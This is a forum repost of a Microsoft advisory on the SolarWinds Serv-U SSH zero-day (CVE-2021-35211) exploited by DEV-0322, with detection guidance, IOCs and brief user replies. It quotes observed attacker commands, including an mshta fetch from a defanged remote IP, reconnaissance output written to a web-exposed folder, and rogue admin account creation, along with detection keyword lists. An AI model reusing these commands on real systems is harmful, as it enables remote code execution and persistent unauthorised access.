Windows 10: Microsoft discovers SolarWinds Serv-U software 0-day exploit

Discus and support Microsoft discovers SolarWinds Serv-U software 0-day exploit in Windows 10 News to solve the problem; Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The... Discussion in 'Windows 10 News' started by Brink, Jul 14, 2021.

  1. Brink Win User

    Microsoft discovers SolarWinds Serv-U software 0-day exploit


    Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.

    The vulnerability being exploited is CVE-2021-35211, which was recently patched by SolarWinds. The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U’s implementation of the Secure Shell (SSH) protocol. If Serv-U’s SSH is exposed to the internet, successful exploitation would give attackers ability to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads, or view and change data. We strongly urge all customers to update their instances of Serv-U to the latest available version.

    Microsoft 365 Defender has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker’s follow-on malicious actions. Microsoft Threat Experts customers who were affected were notified of attacker activity and were aided in responding to the attack.

    Microsoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.

    Who is DEV-0322?

    MSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a “development group” or “DEV group” and assigns each DEV group a unique number (DEV-####) for tracking purposes.

    MSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.

    Attack details

    MSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from Serv-U.exe include:

    • C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
    • cmd.exe /c whoami > “./Client/Common/redacted.txt”
    • cmd.exe /c dir > “.\Client\Common\redacted.txt”
    • cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””
    • powershell.exe C:\Windows\Temp\Serv-U.bat
    • cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

    We observed DEV-0322 piping the output of their cmd.exe commands to files in the Serv-U \Client\Common\ folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new global user to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted .Archive file in the Global Users directory. Serv-U user information is stored in these .Archive files.

    Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, DebugSocketLog.txt. The process could also crash after a malicious command was run.

    By reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.

    To protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a targeted attack notification, which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.

    Detection guidance

    Customers should review the Serv-U DebugSocketLog.txt log file for exception messages like the line below. A C0000005; CSUSSHSocket:Microsoft discovers SolarWinds Serv-U software 0-day exploit :processReceive exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed here.

    EXCEPTION: C0000005; CSUSSHSocket:Microsoft discovers SolarWinds Serv-U software 0-day exploit :processReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

    Additional signs of potential compromise include:

    • Recent creation of .txt files in the Client\Common\ directory for the Serv-U installation. These files may contain output from Windows commands like whoami and dir.
    • Serv-U.exe spawning child processes that are not part of normal operations. These could change depending on the customer environment, but we suggest searching for:
      • mshta.exe
      • powershell.exe
      • cmd.exe (or conhost.exe then spawning cmd.exe) with any of the following in the command line:
        • whoami
        • dir
        • ./Client/Common
        • .\Client\Common
        • type [a file path] > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\[file name].Archive”
      • Any process with any of the following in the command line:
        • C:\Windows\Temp\
    • The addition of any unrecognized global users to Serv-U. This can be checked in the Users tab of the Serv-U Management Console, as shown below. It can also be checked by looking for recently created files in C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users, which appears to store the Global users information.

    Microsoft discovers SolarWinds Serv-U software 0-day exploit Serv-U-console.png

    Detection details

    Antivirus detections

    Microsoft Defender Antivirus detects threat components as the following malware:

    • Behavior:Win32/ServuSpawnSuspProcess.A
    • Behavior:Win32/ServuSpawnCmdClientCommon.A

    Endpoint detection and response (EDR) alerts

    Alerts with the following titles in Microsoft Defender for Endpoint can indicate threat activity on your network:

    • Suspicious behavior by Serv-U.exe

    Azure Sentinel query

    To locate possible exploitation activity using Azure Sentinel, customers can find a Sentinel query containing these indicators in this GitHub repository.

    Indicators of compromise (IOCs)

    • 98[.]176[.]196[.]89
    • 68[.]235[.]178[.]32
    • 208[.]113[.]35[.]58
    • 144[.]34[.]179[.]162
    • 97[.]77[.]97[.]58
    • hxxp://144[.]34[.]179[.]162/a
    • C:\Windows\Temp\Serv-U.bat
    • C:\Windows\Temp\test\current.dmp

    Filed under:

    Cybersecurity


    Source: https://www.microsoft.com/security/b...0-day-exploit/

    :)
     
    Brink, Jul 14, 2021
    #1
  2. Brink Win User

    Microsoft says it identified 40+ victims of the SolarWinds hack

    Read more:
     
    Brink, Jul 14, 2021
    #2
  3. AccOUCH Win User
    Serv-U problems with Windows Defender Antivirus and Windows Firewall

    We are using Serv-U FTP Server in a Windows 10 Pro machine. Starting two weeks ago, Windows Defender detects Serv-U as a threat and stops it. Serv-U was already in the antivirus list exceptions.

    Anyone has experienced a similar issue? What to do to solve this situation?
     
    AccOUCH, Jul 14, 2021
    #3
  4. NMI
    NMI Win User

    Microsoft discovers SolarWinds Serv-U software 0-day exploit

    SolarWind Hack...

    Microsoft Defender has blocked and removed this threat for the last five days, after detecting/warning over the last week:

     
Thema:

Microsoft discovers SolarWinds Serv-U software 0-day exploit

Loading...
  1. Microsoft discovers SolarWinds Serv-U software 0-day exploit - Similar Threads - Microsoft discovers SolarWinds

  2. Google discovers a Windows exploit that points to distribution of spyware

    in Windows 10 News
    Google discovers a Windows exploit that points to distribution of spyware: Google’s in-house Threat Analysis Group has recently uncovered an exploit framework that takes advantage of vulnerabilities in web browsers and other system utilities. TAG has also linked the exploit framework to a Spanish software company based in Barcelona. The exploit...
  3. Malwarebytes Hacked by SolarWinds Attackers

    in AntiVirus, Firewalls and System Security
    Malwarebytes Hacked by SolarWinds Attackers: Excerpts: US cyber-security firm Malwarebytes today said it was hacked by the same group which breached IT software company SolarWinds last year. Malwarebytes said its intrusion is not related to the SolarWinds supply chain incident since the company doesn't use any of...
  4. Microsoft says it identified 40+ victims of the SolarWinds hack

    in Windows 10 News
    Microsoft says it identified 40+ victims of the SolarWinds hack: Microsoft said it identified more than 40 of its customers that installed trojanized versions of the SolarWinds Orion platform and where hackers escalated intrusions with additional, second-stage payloads. The OS maker said it was able to discover these intrusions using data...
  5. SolarWind Hack...

    in AntiVirus, Firewalls and System Security
    SolarWind Hack...: I just read that the hack of the SolarWind software that targeted government facilities also infiltrated MS. I realize its a bit premature to be concerned, but the media seems to be light on information concerning this. Has anyone heard more on this? 170721
  6. Just Discovered Microsoft Malicious Software Removal Tool, And Running It For The First...

    in Windows 10 Ask Insider
    Just Discovered Microsoft Malicious Software Removal Tool, And Running It For The First...: [ATTACH] submitted by /u/HXD-Inferno [link] [comments] https://www.reddit.com/r/Windows10/comments/iwzivr/just_discovered_microsoft_malicious_software/
  7. Temporary micropatch available for zero-day Windows exploit

    in Windows 10 Updates and Activation
    Temporary micropatch available for zero-day Windows exploit: "A publicly disclosed Windows zero-day vulnerability could allow attackers to take full control of systems once they compromise a low-privilege account. Here's a fix." Source: Temporary micropatch available for zero-day Windows exploit 125676
  8. 0 day malware, question.

    in AntiVirus, Firewalls and System Security
    0 day malware, question.: My fb page is Vaios Ganesh, https://www.facebook.com/profile.php?id=100009066564135 I have posted all my findings publicly about the 0 day malware and the problems I have. As I was hit by the malware I noticed the following 1. windows root certificate was set to 1939...
  9. Java zero-day security flaw exploited in the wild

    in AntiVirus, Firewalls and System Security
    Java zero-day security flaw exploited in the wild: Oracle is working with Trend Micro to patch the problem. Until a fix is issued, users concerned about falling victim to the exploit should temporarily disable Java in their browser. The Java zero-day is reportedly being exploited through drive-by downloads on the latest...
  10. Shadow Brokers Release Zero Day Exploit Tools

    in Windows 10 Support
    Shadow Brokers Release Zero Day Exploit Tools: For what it's worth, is the following of any interest? "On Friday, a hacker group known as The Shadow Brokers publicly released a large number of functional exploit tools. Several of these tools make use of zero-day vulnerabilities, most of which are in Microsoft Windows....